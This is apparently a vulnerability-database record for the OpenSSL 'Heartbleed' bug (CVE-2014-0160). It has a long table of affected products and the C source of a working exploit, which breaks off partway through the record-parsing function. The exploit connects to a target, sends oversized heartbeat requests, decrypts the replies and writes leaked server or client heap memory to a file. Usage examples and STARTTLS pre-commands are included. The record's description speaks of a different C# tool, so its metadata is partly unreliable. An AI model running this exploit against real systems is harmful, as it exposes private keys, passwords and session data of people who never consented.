ID
VAR-E-201404-0109
CVE
cve_id: | CVE-2014-0160 | Trust: 9.6 |
cve_id: | CVE-2014-0346 | Trust: 1.0 |
EDB ID
32791
TITLE
OpenSSL TLS Heartbeat Extension - 'Heartbleed' Information Leak (1) - Multiple remote Exploit
Trust: 1.0
DESCRIPTION
Bleed Out is a command line tool written in C# for targeting instances of OpenSSL made vulnerable by the prolific "Heartbleed" bug. The tool aggressively exploits the OpenSSL vulnerability, dumping both ASCII and binary data to files. It also checks the uniqueness of each chunk before persisting it, to ensure that duplicate chunks are not saved.
Trust: 1.5
AFFECTED PRODUCTS
vendor: | openssl | model: | tls heartbeat extension | scope: | - | version: | - | Trust: 1.0 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.4 | Trust: 0.6 |
vendor: | heartbleed | model: | openssl | scope: | - | version: | - | Trust: 0.6 |
vendor: | tls | model: | heartbeat | scope: | - | version: | - | Trust: 0.5 |
vendor: | heartbleed | model: | openssl information leak | scope: | - | version: | - | Trust: 0.5 |
vendor: | mass | model: | bleed | scope: | eq | version: | 20140423 | Trust: 0.5 |
vendor: | heartbleed | model: | tls/dtls information leak | scope: | - | version: | - | Trust: 0.5 |
vendor: | openssl | model: | tls heartbeat extension memory | scope: | - | version: | - | Trust: 0.5 |
vendor: | heartbleed | model: | mass testing script | scope: | - | version: | - | Trust: 0.5 |
vendor: | heartbleed | model: | user session extraction | scope: | - | version: | - | Trust: 0.5 |
vendor: | streamworks | model: | job scheduler release | scope: | eq | version: | 7 | Trust: 0.5 |
vendor: | bleed | model: | out heartbleed command line tool | scope: | eq | version: | 1.0.0.10 | Trust: 0.5 |
vendor: | heartbleed | model: | - | scope: | - | version: | - | Trust: 0.5 |
vendor: | bleed | model: | out heartbleed command line tool | scope: | eq | version: | 1.0.0.0 | Trust: 0.5 |
vendor: | bleed | model: | out heartbleed command line tool | scope: | eq | version: | 1.0.1.46 | Trust: 0.5 |
vendor: | openssl | model: | heartbeat information leak | scope: | - | version: | - | Trust: 0.5 |
vendor: | ubuntu | model: | linux lts i386 | scope: | eq | version: | 12.04 | Trust: 0.3 |
vendor: | ubuntu | model: | linux lts amd64 | scope: | eq | version: | 12.04 | Trust: 0.3 |
vendor: | red | model: | hat enterprise virtualization hypervisor for rhel | scope: | eq | version: | 60 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux workstation optional | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux workstation | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux server optional | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux server | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux hpc node optional | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux hpc node | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux desktop optional | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | red | model: | hat enterprise linux desktop | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 3.2.2 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 3.1.1 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 3.0.1 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.7.2 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.6.5 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.6.2 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.5.6 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.5.5 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.5.3 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.5.2 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.5.1 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.4.5 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.4.4 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.4.3 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.4.2 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.4.1 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.3.6 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.3.5 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.3.4 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.3.3 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.3.2 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.3.1 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.3 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.2.3 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.2.2 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.2.1 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.2 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.1.3 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.1.2 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.1.1 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.1 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.0.1 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.0 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 1.6.1 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 1.6 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 1.5.2 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 3.3 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 3.2 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 3.1.2 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 3.1 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.7 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.6 | Trust: 0.3 |
vendor: | python | model: | software foundation python | scope: | eq | version: | 2.5 | Trust: 0.3 |
vendor: | oracle | model: | enterprise linux | scope: | eq | version: | 6.2 | Trust: 0.3 |
vendor: | oracle | model: | enterprise linux | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | opera | model: | software opera | scope: | eq | version: | 11.10 | Trust: 0.3 |
vendor: | openssl | model: | project openssl 1.0.1c | scope: | - | version: | - | Trust: 0.3 |
vendor: | openssl | model: | project openssl 1.0.1a | scope: | - | version: | - | Trust: 0.3 |
vendor: | openssl | model: | project openssl | scope: | eq | version: | 1.0.1 | Trust: 0.3 |
vendor: | mcafee | model: | security for microsoft exchange | scope: | eq | version: | 7.6 | Trust: 0.3 |
vendor: | mcafee | model: | epolicy orchestrator | scope: | eq | version: | 4.5 | Trust: 0.3 |
vendor: | kerio | model: | control patch | scope: | eq | version: | 7.1.01 | Trust: 0.3 |
vendor: | kerio | model: | control | scope: | eq | version: | 7.1.0 | Trust: 0.3 |
vendor: | ipswitch | model: | imail server | scope: | eq | version: | 11.02 | Trust: 0.3 |
vendor: | ipswitch | model: | imail server | scope: | eq | version: | 11.01 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 7.0.1.2 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 7.0.1.1 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 7.02 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 6.0.26 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 6.0.2.9 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 6.0.2.7 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 6.0.2.6 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 6.0.2.5 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 6.0.2.4 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 6.0.2.3 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 6.0.2.2 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 6.0.2.1 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 6.0.1.1 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 6.0.1 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 5.3.1 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 5.3 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 7.0.1.5 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 7.0.1.4 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 7.0.1.3 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 7.0.1.0 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 7.0.0.1 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 6.0.2.8 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 6.0.2.11 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 6.0.2.10 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 6.0.2.0 | Trust: 0.3 |
vendor: | ibm | model: | websphere mq | scope: | eq | version: | 6.0.1.0 | Trust: 0.3 |
vendor: | ibm | model: | tivoli management framework | scope: | eq | version: | 4.1.1 | Trust: 0.3 |
vendor: | ibm | model: | rational clearquest | scope: | eq | version: | 8.0.0.2 | Trust: 0.3 |
vendor: | ibm | model: | rational clearquest | scope: | eq | version: | 8.0.0.1 | Trust: 0.3 |
vendor: | ibm | model: | rational clearquest | scope: | eq | version: | 7.1.2.6 | Trust: 0.3 |
vendor: | ibm | model: | rational clearquest | scope: | eq | version: | 7.1.2.2 | Trust: 0.3 |
vendor: | ibm | model: | rational clearquest | scope: | eq | version: | 7.1.2.1 | Trust: 0.3 |
vendor: | ibm | model: | rational clearquest | scope: | eq | version: | 7.1.2 | Trust: 0.3 |
vendor: | ibm | model: | rational clearcase | scope: | eq | version: | 7.1.2.2 | Trust: 0.3 |
vendor: | ibm | model: | rational clearquest | scope: | eq | version: | 8.0 | Trust: 0.3 |
vendor: | ibm | model: | rational clearquest | scope: | eq | version: | 7.1.2.5 | Trust: 0.3 |
vendor: | ibm | model: | aix | scope: | eq | version: | 7.1 | Trust: 0.3 |
vendor: | ibm | model: | aix | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | ibm | model: | aix | scope: | eq | version: | 5.3 | Trust: 0.3 |
vendor: | gentoo | model: | linux | scope: | - | version: | - | Trust: 0.3 |
vendor: | debian | model: | linux sparc | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux s/390 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux powerpc | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux mips | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux ia-64 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux ia-32 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux arm | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | debian | model: | linux amd64 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | cisco | model: | wireless location appliance | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | cisco | model: | telepresence video communication server | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | cerberus | model: | ftp server | scope: | eq | version: | 4.0.9.8 | Trust: 0.3 |
vendor: | centos | model: | centos | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | bluecat | model: | networks adonis | scope: | eq | version: | 4.1.43 | Trust: 0.3 |
vendor: | avaya | model: | aura system manager | scope: | eq | version: | 6.2 | Trust: 0.3 |
vendor: | avaya | model: | aura session manager | scope: | eq | version: | 6.2.1 | Trust: 0.3 |
vendor: | avaya | model: | aura session manager | scope: | eq | version: | 6.2 | Trust: 0.3 |
vendor: | avaya | model: | aura presence services | scope: | eq | version: | 6.1.1 | Trust: 0.3 |
vendor: | attachmate | model: | reflection | scope: | eq | version: | x14.0.5 | Trust: 0.3 |
vendor: | attachmate | model: | reflection | scope: | eq | version: | x14.1 | Trust: 0.3 |
vendor: | attachmate | model: | reflection | scope: | eq | version: | x14.0 | Trust: 0.3 |
vendor: | attachmate | model: | reflection suite for | scope: | eq | version: | x14.0.5 | Trust: 0.3 |
vendor: | attachmate | model: | reflection for unix and openvms | scope: | eq | version: | 14.0.5 | Trust: 0.3 |
vendor: | attachmate | model: | reflection for the multi-host enterprise pro | scope: | eq | version: | 14.0.5 | Trust: 0.3 |
vendor: | attachmate | model: | reflection for ibm | scope: | eq | version: | 14.0.5 | Trust: 0.3 |
vendor: | attachmate | model: | reflection for ibm | scope: | eq | version: | 14 | Trust: 0.3 |
vendor: | attachmate | model: | reflection for hp | scope: | eq | version: | 14.0.5 | Trust: 0.3 |
vendor: | attachmate | model: | reflection | scope: | eq | version: | 14.1 | Trust: 0.3 |
vendor: | attachmate | model: | reflection sp1 | scope: | eq | version: | 14.0 | Trust: 0.3 |
vendor: | attachmate | model: | reflection | scope: | eq | version: | 14.0 | Trust: 0.3 |
vendor: | apple | model: | airport extreme | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | cisco | model: | css11500 content services switch | scope: | ne | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ace module | scope: | ne | version: | 0 | Trust: 0.3 |
vendor: | blue | model: | coat systems policy center | scope: | ne | version: | 0 | Trust: 0.3 |
vendor: | blue | model: | coat systems packetshaper | scope: | ne | version: | 0 | Trust: 0.3 |
vendor: | blue | model: | coat systems intelligence center | scope: | ne | version: | 0 | Trust: 0.3 |
vendor: | blue | model: | coat systems director | scope: | ne | version: | 0 | Trust: 0.3 |
EXPLOIT
/*
* CVE-2014-0160 heartbleed OpenSSL information leak exploit
* =========================================================
* This exploit uses OpenSSL to create an encrypted connection
* and trigger the heartbleed leak. The leaked information is
* returned within encrypted SSL packets and is then decrypted
* and wrote to a file to annoy IDS/forensics. The exploit can
* set heartbeat payload length arbitrarily or use two preset
* values for NULL and MAX length. The vulnerability occurs due
* to bounds checking not being performed on a heap value which
* is user supplied and returned to the user as part of DTLS/TLS
* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to
* 1.0.1f are known affected. You must run this against a target
* which is linked to a vulnerable OpenSSL library using DTLS/TLS.
* This exploit leaks upto 65535 bytes of remote heap each request
* and can be run in a loop until the connected peer ends connection.
* The data leaked contains 16 bytes of random padding at the end.
* The exploit can be used against a connecting client or server,
* it can also send pre_cmd's to plain-text services to establish
* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients
* will often forcefully close the connection during large leak
* requests so try to lower your payload request size.
*
* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g
*
* E.g.
* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed
* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1
* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit
* [ =============================================================
* [ connecting to 192.168.11.23 443/tcp
* [ connected to 192.168.11.23 443/tcp
* [ <3 <3 <3 heart bleed <3 <3 <3
* [ heartbeat returned type=24 length=16408
* [ decrypting SSL packet
* [ heartbleed leaked length=65535
* [ final record type=24, length=16384
* [ wrote 16381 bytes of heap to file 'out'
* [ heartbeat returned type=24 length=16408
* [ decrypting SSL packet
* [ final record type=24, length=16384
* [ wrote 16384 bytes of heap to file 'out'
* [ heartbeat returned type=24 length=16408
* [ decrypting SSL packet
* [ final record type=24, length=16384
* [ wrote 16384 bytes of heap to file 'out'
* [ heartbeat returned type=24 length=16408
* [ decrypting SSL packet
* [ final record type=24, length=16384
* [ wrote 16384 bytes of heap to file 'out'
* [ heartbeat returned type=24 length=42
* [ decrypting SSL packet
* [ final record type=24, length=18
* [ wrote 18 bytes of heap to file 'out'
* [ done.
* $ ls -al out
* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out
* $ hexdump -C out
* - snip - snip
*
* Use following example command to generate certificates for clients.
*
* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
* -keyout server.key -out server.crt
*
* Debian compile with "gcc heartbleed.c -o heartbleed -Wl,-Bstatic \
* -lssl -Wl,-Bdynamic -lssl3 -lcrypto"
*
* todo: add udp/dtls support.
*
* - Hacker Fantastic
* http://www.mdsec.co.uk
*
*/
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>
#include <signal.h>
#include <netdb.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <inttypes.h>
#include <openssl/bio.h>
#include <openssl/ssl.h>
#include <openssl/err.h>
#include <openssl/evp.h>
#include <openssl/tls1.h>
#include <openssl/rand.h>
#include <openssl/buffer.h>
#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \
(((unsigned int)(c[1])) )),c+=2)
#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \
c[1]=(unsigned char)(((s) )&0xff)),c+=2)
int first = 0;
int leakbytes = 0;
int repeat = 1;
int badpackets = 0;
typedef struct {
int socket;
SSL *sslHandle;
SSL_CTX *sslContext;
} connection;
typedef struct {
unsigned char type;
short version;
unsigned int length;
unsigned char hbtype;
unsigned int payload_length;
void* payload;
} heartbeat;
void ssl_init();
void usage();
int tcp_connect(char*,int);
int tcp_bind(char*, int);
connection* tls_connect(int);
connection* tls_bind(int);
int pre_cmd(int,int,int);
void* heartbleed(connection* ,unsigned int);
void* sneakyleaky(connection* ,char*, int);
int tcp_connect(char* server,int port){
int sd,ret;
struct hostent *host;
struct sockaddr_in sa;
host = gethostbyname(server);
sd = socket(AF_INET, SOCK_STREAM, 0);
if(sd==-1){
printf("[!] cannot create socket\n");
exit(0);
}
sa.sin_family = AF_INET;
sa.sin_port = htons(port);
sa.sin_addr = *((struct in_addr *) host->h_addr);
bzero(&(sa.sin_zero),8);
printf("[ connecting to %s %d/tcp\n",server,port);
ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));
if(ret==0){
printf("[ connected to %s %d/tcp\n",server,port);
}
else{
printf("[!] FATAL: could not connect to %s %d/tcp\n",server,port);
exit(0);
}
return sd;
}
int tcp_bind(char* server, int port){
int sd, ret, val=1;
struct sockaddr_in sin;
struct hostent *host;
host = gethostbyname(server);
sd=socket(AF_INET,SOCK_STREAM,0);
if(sd==-1){
printf("[!] cannot create socket\n");
exit(0);
}
memset(&sin,0,sizeof(sin));
sin.sin_addr=*((struct in_addr *) host->h_addr);
sin.sin_family=AF_INET;
sin.sin_port=htons(port);
setsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));
ret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));
if(ret==-1){
printf("[!] cannot bind socket\n");
exit(0);
}
listen(sd,5);
return(sd);
}
void ssl_init(){
SSL_load_error_strings();
SSL_library_init();
OpenSSL_add_all_digests();
OpenSSL_add_all_algorithms();
OpenSSL_add_all_ciphers();
}
connection* tls_connect(int sd){
connection *c;
c = malloc(sizeof(connection));
if(c==NULL){
printf("[ error in malloc()\n");
exit(0);
}
c->socket = sd;
c->sslHandle = NULL;
c->sslContext = NULL;
c->sslContext = SSL_CTX_new(SSLv23_client_method());
SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);
if(c->sslContext==NULL)
ERR_print_errors_fp(stderr);
c->sslHandle = SSL_new(c->sslContext);
if(c->sslHandle==NULL)
ERR_print_errors_fp(stderr);
if(!SSL_set_fd(c->sslHandle,c->socket))
ERR_print_errors_fp(stderr);
if(SSL_connect(c->sslHandle)!=1)
ERR_print_errors_fp(stderr);
if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
printf("[ warning: heartbeat extension is unsupported (try anyway)\n");
}
return c;
}
connection* tls_bind(int sd){
int bytes;
connection *c;
char* buf;
buf = malloc(4096);
if(buf==NULL){
printf("[ error in malloc()\n");
exit(0);
}
memset(buf,0,4096);
c = malloc(sizeof(connection));
if(c==NULL){
printf("[ error in malloc()\n");
exit(0);
}
c->socket = sd;
c->sslHandle = NULL;
c->sslContext = NULL;
c->sslContext = SSL_CTX_new(SSLv23_server_method());
if(c->sslContext==NULL)
ERR_print_errors_fp(stderr);
SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);
SSL_CTX_SRP_CTX_init(c->sslContext);
SSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);
SSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM);
if(!SSL_CTX_check_private_key(c->sslContext)){
printf("[!] FATAL: private key does not match the certificate public key\n");
exit(0);
}
c->sslHandle = SSL_new(c->sslContext);
if(c->sslHandle==NULL)
ERR_print_errors_fp(stderr);
if(!SSL_set_fd(c->sslHandle,c->socket))
ERR_print_errors_fp(stderr);
int rc = SSL_accept(c->sslHandle);
printf ("[ SSL connection using %s\n", SSL_get_cipher (c->sslHandle));
bytes = SSL_read(c->sslHandle, buf, 4095);
printf("[ recieved: %d bytes - showing output\n%s\n[\n",bytes,buf);
if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
printf("[ warning: heartbeat extension is unsupported (try anyway)\n");
}
return c;
}
int pre_cmd(int sd,int precmd,int verbose){
/* this function can be used to send commands to a plain-text
service or client before heartbleed exploit attempt. e.g. STARTTLS */
int rc, go = 0;
char* buffer;
char* line1;
char* line2;
switch(precmd){
case 0:
line1 = "EHLO test\n";
line2 = "STARTTLS\n";
break;
case 1:
line1 = "CAPA\n";
line2 = "STLS\n";
break;
case 2:
line1 = "a001 CAPB\n";
line2 = "a002 STARTTLS\n";
break;
default:
go = 1;
break;
}
if(go==0){
buffer = malloc(2049);
if(buffer==NULL){
printf("[ error in malloc()\n");
exit(0);
}
memset(buffer,0,2049);
rc = read(sd,buffer,2048);
printf("[ banner: %s",buffer);
send(sd,line1,strlen(line1),0);
memset(buffer,0,2049);
rc = read(sd,buffer,2048);
if(verbose==1){
printf("%s\n",buffer);
}
send(sd,line2,strlen(line2),0);
memset(buffer,0,2049);
rc = read(sd,buffer,2048);
if(verbose==1){
printf("%s\n",buffer);
}
}
return sd;
}
void* heartbleed(connection *c,unsigned int type){
unsigned char *buf, *p;
int ret;
buf = OPENSSL_malloc(1 + 2);
if(buf==NULL){
printf("[ error in malloc()\n");
exit(0);
}
p = buf;
*p++ = TLS1_HB_REQUEST;
switch(type){
case 0:
s2n(0x0,p);
break;
case 1:
s2n(0xffff,p);
break;
default:
printf("[ setting heartbeat payload_length to %u\n",type);
s2n(type,p);
break;
}
printf("[ <3 <3 <3 heart bleed <3 <3 <3\n");
ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);
OPENSSL_free(buf);
return c;
}
void* sneakyleaky(connection *c,char* filename, int verbose){
char *p;
int ssl_major,ssl_minor,al;
int enc_err,n,i;
SSL3_RECORD *rr;
SSL_SESSION *sess;
SSL* s;
unsigned char md[EVP_MAX_MD_SIZE];
short version;
unsigned mac_size, orig_len;
size_t extra;
rr= &(c->sslHandle->s3->rrec);
sess=c->sslHandle->session;
s = c->sslHandle;
if (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER)
extra=SSL3_RT_MAX_EXTRA;
else
extra=0;
if ((s->rstate != SSL_ST_READ_BODY) ||
(s->packet_length < SSL3_RT_HEADER_LENGTH)) {
n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);
if (n <= 0)
goto apple;
s->rstate=SSL_ST_READ_BODY;
p=s->packet;
rr->type= *(p++);
ssl_major= *(p++);
ssl_minor= *(p++);
version=(ssl_major<<8)|ssl_minor;
n2s(p,rr->length);
if(rr->type==24){
printf("[ heartbeat returned type=%d length=%u\n",rr->type, rr->length);
if(rr->length > 16834){
printf("[ error: got a malformed TLS length.\n");
exit(0);
}
}
else{
printf("[ incorrect record type=%d length=%u returned\n",rr->type,rr->length);
s->packet_length=0;
badpackets++;
if(badpackets > 3){
printf("[ error: too many bad packets recieved\n");
exit(0);
}
goto apple;
}
}
if (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){
i=rr->length;
n=ssl3_read_n(s,i,i,1);
if (n <= 0) goto apple;
}
printf("[ decrypting SSL packet\n");
s->rstate=SSL_ST_READ_HEADER;
rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);
rr->data=rr->input;
tls1_enc(s,0);
if((sess != NULL) &&
(s->enc_read_ctx != NULL) &&
(EVP_MD_CTX_md(s->read_hash) != NULL))
{
unsigned char *mac = NULL;
unsigned char mac_tmp[EVP_MAX_MD_SIZE];
mac_size=EVP_MD_CTX_size(s->read_hash);
OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);
orig_len = rr->length+((unsigned int)rr->type>>8);
if(orig_len < mac_size ||
(EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&
orig_len < mac_size+1)){
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);
}
if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){
mac = mac_tmp;
ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);
rr->length -= mac_size;
}
else{
rr->length -= mac_size;
mac = &rr->data[rr->length];
}
i = tls1_mac(s,md,0);
if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)
enc_err = -1;
if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size)
enc_err = -1;
}
if(enc_err < 0){
al=SSL_AD_BAD_RECORD_MAC;
SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);
goto apple;
}
if(s->expand != NULL){
if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) {
al=SSL_AD_RECORD_OVERFLOW;
SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);
goto apple;
}
if (!ssl3_do_uncompress(s)) {
al=SSL_AD_DECOMPRESSION_FAILURE;
SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);
goto apple;
}
}
if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) {
al=SSL_AD_RECORD_OVERFLOW;
SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);
goto apple;
}
rr->off=0;
s->packet_length=0;
if(first==0){
uint heartbleed_len = 0;
char* fp = s->s3->rrec.data;
(long)fp++;
memcpy(&heartbleed_len,fp,2);
heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;
first = 2;
leakbytes = heartbleed_len + 16;
printf("[ heartbleed leaked length=%u\n",heartbleed_len);
}
if(verbose==1){
{ unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\n'); }
printf("\n");
}
leakbytes-=rr->length;
if(leakbytes > 0){
repeat = 1;
}
else{
repeat = 0;
}
printf("[ final record type=%d, length=%u\n", rr->type, rr->length);
int output = s->s3->rrec.length-3;
if(output > 0){
int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);
if(first==2){
first--;
write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
/* first three bytes are resp+len */
printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length-3,filename);
}
else{
/* heap data & 16 bytes padding */
write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length,filename);
}
close(fd);
}
else{
printf("[ nothing from the heap to write\n");
}
return;
apple:
printf("[ problem handling SSL record packet - wrong type?\n");
badpackets++;
if(badpackets > 3){
